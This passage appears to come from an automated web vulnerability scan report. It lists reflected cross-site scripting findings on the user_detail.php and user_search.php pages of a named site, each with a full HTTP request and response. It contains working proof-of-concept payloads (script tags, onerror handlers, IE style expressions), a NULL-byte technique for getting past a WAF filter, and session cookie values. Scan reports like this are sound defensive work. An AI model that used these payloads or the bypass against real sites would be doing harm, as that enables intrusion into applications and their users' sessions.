This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /user_detail.php?u=filmstw705%00b588e<img%20src%3da%20onerror%3dalert(1)>93341557b13 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:04:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>filmstw705\0b588e<img src=a onerror=alert(1)>93341557b13</b>
...[SNIP]...

2.4934. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88a42"%20style%3dx%3aexpression(alert(1))%209c0d9d14881 was submitted in the u parameter. This input was echoed as 88a42\" style=x:expression(alert(1)) 9c0d9d14881 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /user_detail.php?u=rijiy88a42"%20style%3dx%3aexpression(alert(1))%209c0d9d14881 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=rijiy88a42\" style=x:expression(alert(1)) 9c0d9d14881">
...[SNIP]...

2.4935. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d74e8"><a%20b%3dc>807f7c6ebed was submitted in the u parameter. This input was echoed as d74e8\"><a b=c>807f7c6ebed in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_detail.php?u=sangagad74e8"><a%20b%3dc>807f7c6ebed HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=sangagad74e8\"><a b=c>807f7c6ebed">
...[SNIP]...

2.4936. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload f6992<x%20style%3dx%3aexpr/**/ession(alert(1))>3ab964bde7a was submitted in the u parameter. This input was echoed as f6992<x style=x:expr/**/ession(alert(1))>3ab964bde7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /user_detail.php?u=johnsun888f6992<x%20style%3dx%3aexpr/**/ession(alert(1))>3ab964bde7a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:06:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>johnsun888f6992<x style=x:expr/**/ession(alert(1))>3ab964bde7a</b>
...[SNIP]...

2.4937. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 176a1"%20style%3dx%3aexpression(alert(1))%2059d0776d08c was submitted in the u parameter. This input was echoed as 176a1\" style=x:expression(alert(1)) 59d0776d08c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /user_detail.php?u=lobpitte176a1"%20style%3dx%3aexpression(alert(1))%2059d0776d08c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=lobpitte176a1\" style=x:expression(alert(1)) 59d0776d08c">
...[SNIP]...

2.4938. http://www.resellerbase.com/user_search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d196<script>alert(1)</script>ca9531f6925 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_search.php6d196<script>alert(1)</script>ca9531f6925 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /user_search.php6d196<script>alert(1)</script>ca9531f6925 was not found on this server.</p>
...[SNIP]...

2.4939. http://www.resellerbase.com/user_search.php [aol parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the aol request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83147"><a>7f45903168c was submitted in the aol parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com83147"><a>7f45903168c&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com83147"><a>7f45903168c&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-5
...[SNIP]...

2.4940. http://www.resellerbase.com/user_search.php [biography parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the biography request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4747"><a>7c69048461 was submitted in the biography parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=3&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=f4747"><a>7c69048461&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 13977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=&aol=&biography=f4747"><a>7c69048461&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4941. http://www.resellerbase.com/user_search.php [email parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94963"><a>30349241ce0 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=94963"><a>30349241ce0&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=94963"><a>30349241ce0&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4942. http://www.resellerbase.com/user_search.php [homepage parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the homepage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f722"><a>7c3544e3aeb was submitted in the homepage parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=&name=&homepage=8f722"><a>7c3544e3aeb&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=&homepage=8f722"><a>7c3544e3aeb&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4943. http://www.resellerbase.com/user_search.php [icq parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the icq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f347"><a>1a824937a50 was submitted in the icq parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=&name=&homepage=&icq=3f347"><a>1a824937a50&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=&homepage=&icq=3f347"><a>1a824937a50&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4944. http://www.resellerbase.com/user_search.php [interest parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the interest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a69"><a>905119d8e88 was submitted in the interest parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.come3a69"><a>905119d8e88&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
f="/user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.come3a69"><a>905119d8e88&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com&ltr=%23">
...[SNIP]...

2.4945. http://www.resellerbase.com/user_search.php [location parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the location request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bf6e"><a>073c336f7d0 was submitted in the location parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com7bf6e"><a>073c336f7d0&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com7bf6e"><a>073c336f7d0&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com&ltr=%23">
...[SNIP]...

2.4946. http://www.resellerbase.com/user_search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6be1"><script>alert(1)</script>6a1b1d89052 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_search.php?pflag=search&b6be1"><script>alert(1)</script>6a1b1d89052=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:24:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 26462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?pflag=search&b6be1"><script>alert(1)</script>6a1b1d89052=1&ltr=%23">
...[SNIP]...

2.4947. http://www.resellerbase.com/user_search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 725a8"><a>6b697e5711f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example/725a8"><a>6b697e5711f.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:04:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
5-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example/725a8"><a>6b697e5711f.com&ltr=%23">
...[SNIP]...

2.4948. http://www.resellerbase.com/user_search.php [name parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae006"><a>c850263ca11 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=&name=ae006"><a>c850263ca11&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=ae006"><a>c850263ca11&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4949. http://www.resellerbase.com/user_search.php [occupation parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_search.php

Issue detail

The value of the occupation request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c098b"><a>bee91fbe589 was submitted in the occupation parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.comc098b"><a>bee91fbe589&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
